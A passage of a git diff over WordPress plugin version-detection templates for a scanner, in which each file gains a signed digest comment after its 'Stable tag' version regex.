4b0a004830460221008a943d647e27db13fc22e856b0343c87c881c9807a7e3ab648093cda2a698d3c022100fb26216f71f2829536a4b7d1442b78cb19f3b372057038781ee4ebde3b466eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..e796240a3a 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220726048f4674c0acb48170ba8c7c0c2f8f8f876bc807c79bd480e8aebc2b3b7830220022c976fb70b03ba723f4cdb63ef6562b628ac9e66ca316b45d3865f5b5a9ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..4ad41d6423 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009a563e9866297f9f5d128b00e344f889ff8fbd57ae329eece88704e893459342022100c6f9d4d273b98ba30c05fe97f427065f0ddc14ad0c47a2f86dd5f49f0e779397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..5ad35669f5 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ff3210123aada26a7fa7e8e01b9bf616f10d5244821f5d2a9446696bac19bdac02207357b82ef4b932317b05d3a321c4e8abe5cc7cc58eb62efcd332f1535f561335:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..b2edcb9c35 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207aa1ebf1b452bce9355c368919674b040c2ab1bc0abffc19cab935021faf21c502203d5fc5b3d686b24b676ca54bf73ea0a5d71c12c55e370d116a6e29629166ee2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..d26da0594d 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b7fc6d130cd86918aca789549d845f52a01a9f07432866d327b6d974a6c453ef022100edbce48982ca278cef9fee8cb6c4b1d714ff45c3cea32671178ede447f83f888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..4a222ce9aa 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205eddc340416e6b6fb5d535f237ee00982e65b2402647ea09db0c47e4133f8aa7022100a551f18c508580424de35bf9577b4fad527541a0ad61bb5a3007d0f70e406c15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..68b5ed2178 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008c7c8935cf74d79a4c37c2e09bd3a2f9284c6dd76d644ce42d150c24a505fbc302210092aef3c8953bef125cf8350983362a663e7b800979b41534fd0f339d608510c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..029ea6f11d 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b77e126f8fbf7fe936eb5c340477c77da56715c98e5f92a0a5df1e80e1027b9a022026c1c71a7730566dcfd845fbde7d33d9094d3eecc67372b6c1eed4b103c5492e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..a522929c06 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c68165c7919e2f91e9a13d591679b06d90a49c760e8563bbf675a8bdda6b4cc30221009e5e3ea1e76b4d979560560b511626f53c6566f9760cae5954e0c3a0906ed3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..65e8c26128 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008473dbeedca6a8a2b46a5f5c58d0a1625a9ceda6dfe2f789bb7846c706196c7902205ab99b59802a9bc2ea4f9a357d112caf6ae2246bc04854706d5ba9f3b174c21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ed3161d27c..ac12c86652 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204e09258bbec6b88471a1fa0b48b27f36eeeaba987023e4810405142ef78c2b5302204c68b3e54759b42f493ec67c0f7d1ecad87c055ddc0aa05c97f5161fdbb7d73b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..afef7223a5 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100cafe6a8d0f79388d3e0f17e0a943c1e44a1a8dc8c332d9a504065742d64dda5c02203ff6002361af4b23c7ffa84f0c5122db66b4966bbcb93ada1f0079d987c4ba28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..44d9a824c3 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202bc0330be0f0a36ccad85489d93c0b0abec962e6b974ec70f5b5b148e001e328022012f17dcf131c8d1b4d33778906445e1dcb840db20f8f356d33914a25570d3763:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..d7a8fd2700 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022040cbc8a126d53b12bd7560dd62ee700532b58141f2f7c3d9bad6d55511733dd3022100cdffa48c655a499a98b9dd7d86b1c932a9b3a4957cb582d688e69e1ded39d065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..c0daff6abd 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022077a69b2608be7f94696c1c5a1abf97b0b1a2ab8701bd908351918900ffd2a96402200460d7658a1ef642bbbedca751acb669f2421682b6c093ef4cc7c3744a0fdef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..e723294478 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203eb09717c16b43ca209508e277227db93b619ecf0fb05a5e28ed9f1bab51fe34022100ed7a6facfb0022442d116f2f8abe14f2f6bcce2d5b9a93a22f75e06b525c8760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..5f414bdf51 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022020357c4e52d85fcf81139d70b65d3579dd294140374be326757c570a17e53b74022100f463c0ee16d9233ad1f9de565aa29bc7f8cedb6d79aa62e5b6a37b8a17a57018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..8aad09ee20 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100940076336c3dc85ab35b854362fc7d271a1a49bc9b1b7a6435b4d99e888ea16c02206c7ce3703a2014a2628a27dac522381bbcb7daa168a2654bfd03349e5a8657de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index d69709b8f9..e8c40715cf 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b4097bc3800531cdd702a9fcbfa6067668cde22360fe8c94993a2502f8380e8802210096b71f61b9d42f63433b5773ccea9e6e9790e035eb0494ba241fbf570b4b02cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..41b6313846 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203d880a5cf0947aac75a0025234c9f029ea4f36df55a766f6a910716ba81de525022100acf12b738bcd96241110f2d5060c04ef5951788a83a78c0b9735926e33ef808c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..9bc9e341af 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022064598f7718c3d3899a25311e1903c2fd76e1da305f2eff0ac8b78855fd51c83702204141b1276c47ff94c02583139e31636adbcdb8c213dd0e16c0eb89491cb87ca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..4110699977 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a409feb9213cd9901e532805c3ca7e434106b94d831fd8acd5e096cff36b88ab022100e9a23b119d945d0fdd0d3952038a6b310794c24eea084afeb5444d610bfc6141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..83fbdb379c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220528e89ee0ccc688d583da922f321bedccbec5925b2db36806fe6468497f2032f022100dd990d75eb62df6b196ab7a1d050222a7f6c02dd8be80df08e03f0db5d60d2b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 59a655c424..80a05852dc 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022043a480741bd31248b2cb45fed069ab0643de0524e12970b798c6f6d4cd4c8c9f022100ca2b1da0a6ca4d7d3011e3ba838093fabadd707b94fce08b198f69f4eab76084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..fb822c293c 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 480a004530430220619b56fa96066288e11319ca3855ecfd502c235e4b547b607ea6f4a4af288733021f34d1531efea2876635ba537eff9be8ae615f8bf0992903c891c6c98bcc6f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..c37babc59e 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e5265e63ae626236f870a7fb122d39372f6425f0b3d38ba7c07a23bd9c68ef870220204a55d1bb48d6612a5464200de525dc0067488ac03bd83a8502af99b31963f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..5ff932a606 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201d3ffcb3d4a4d3bc4679bf08f68794c52f16e5aa454f95364cd7b867c8249c90022100b3b4ab41d65a8458f3438192c895c01ebdb528f04a48d54e97fa628211a7033e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..63d34e6445 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d15e2084fbf368b2ec133d5f735477f18f65768693515903856cf4e992a164910220227de23531a12919771a1c24fc5a247df467f0d2c769712da63a16f7c85c114d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..c9e7d9410e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d7b4c563bccfe3ed176dffa25900d6c07ae47350bec873e4882939ad7bc9483c0221008459d92ea6ad8bbd0c8f715597f3de1f1aa180b9ace7430776719edd0a4bdf80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..27f5213500 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022068575af38fc807a0b0e6ef9cd49944f6a859aa39978692507606921f67f447a3022100b03f06e754823ae8eab0086b10c8e4a71862d71adfd4e537aa48b5158d04a09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..994fc5ed4d 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022023609ca51bdb3fc40dbdeee9d67720eb36fecef2205cc95690d443336ffc8f39022100e1b6f5ffccc0953be53b9785ad459ff31f2c346f601932815c86d0e5cb2dd6e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..1d69805805 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008959dfefcee035e8a8f8ee4e2b35d3a7b7bd7496be5bd914e63e16c1e879bf4502207b5ef7c1b28bac9820bd8ab11a5c61eedfd73fffa1993f4fe336012c24632e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..6e3075279d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201b7193ae91903f1b8e81bb52f49d50c62473a4f7c3c3d4819ca521c56d5c8f2602201594ce7c416f99aeafd7ded4253e00561cd94a22511d67373741ec1073723179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..4016bf3c26 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d46cbeb9903028ef87856f7a1313609bd11d2010b9247e60b86bd194ccfe55530221008cbe859d256a4f19c8d3ca650b84c476f4d56c2f64af65bb794121fc3a861bba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..cac8b54b28 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205a7353bc388617840a2fa6c79e4ea5b84a4bbbd4b92c539653aa358a78e1a877022007b8cd310b25deb35c4aa9a18cd962909a28b8f2ff07b01a11526e6173480f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..e9d6b554b2 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022044ef88e2b0066d02ae4a0d672597e72a9a4c48e2a3d25fd900e20e214e25c14a022100f781247deff7a4b6f3ba4576f3f4d9c11b386c1ece873d5a55eeb449cffc4e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..f85f658d38 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e6895c218271c0d4ee38fced9ac2e68a8c2c755672d224ed77b14b289d39a81c022100dbe206fd4e656b8c7a57d66ca2faf81f4c9b4f7ca632e6a83b0b11306cf49892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..a3d3ee7c21 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203e2050807031025a06f8961c83bc69b583fb3f9624c9584c5958d6aa917be60b02206ec8ae0228ed0313c87f3dcc6c078a39f0e1525a8b649ed4055251d454d48934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..601272aef9 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100be53c33c8be0b5eed48addc3f0f78a7e63ed11b0208a5eb322b0c485eadd7fd2022013d2893f2a4b86c5323ac8fba0650faf39e3a15af46a62b68295eff3465de91f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 97b7306b75..9bebf2aa6c 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220491e79f8f8cab7441869eca9c6e462fe52ccd63a4383783474b6335c1e5e74d5022100c41084bd102542aa2495e89852887b72e1b3adf97c70480b8984486ec2ebb971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..c3d31b48c3 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220525a742a0e05a8e9a35a6363549c602b2480ad874af4cd176719d01510c497d602203943aa9b14492b019a6a27519f7f7238f64284a68969bb1d7216b9c5817fa314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..d07d82d93b 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220663377cae9d8c8b80a99543db1a182c02fb0e6944685a17cce6c79a73e3c5349022100a543f3cd2cfc2d46f14541e6b7b37393713afa112e71b5740095b9eaf0caefdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..70022d453c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d9b9d9ac299ad31af342a485fea9bc0089f773133dfbc35993a85fde31b85a890220617fc37cd28e13e6ef2f8f29b9501021f0fb67e2c1f2f9749f9e9a5df11f9a0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..b06025bd71 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200114b273fae2b23db3a04342627951959e34c286145c560bdccc8116ac4765d3022100a658ab09594a8a4ebbd36b158ec5eecebb7ce6f2ff8fbe536e0a72f928c3f9dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..ead3bde1a5 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022020409c97d9c6112784e92af9260712e29f46e850666bec28d9f64f8c0e9b6969022023790f2d622047d8c2f8bf341a1d790b6566334fd19eef2ade5ba2a74c3a246e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..b35dfa2686 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d6faed27620d23594abb234ae43c42cdff06339c3ae0cee244cc4b91cac4d56d022100a49464197a0e647ed7f98c37734c8fc1be59d25fa75eeecfc9d707094a8f0d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..595cecfe3b 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f84c6ca4ad1c394ba1a0cc18f0b21be6eb7282c0debae1e268781d6b9830d995022100f83621e43d68e441ad073c706c5a57163c78be57362036695fb4d132081434a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml 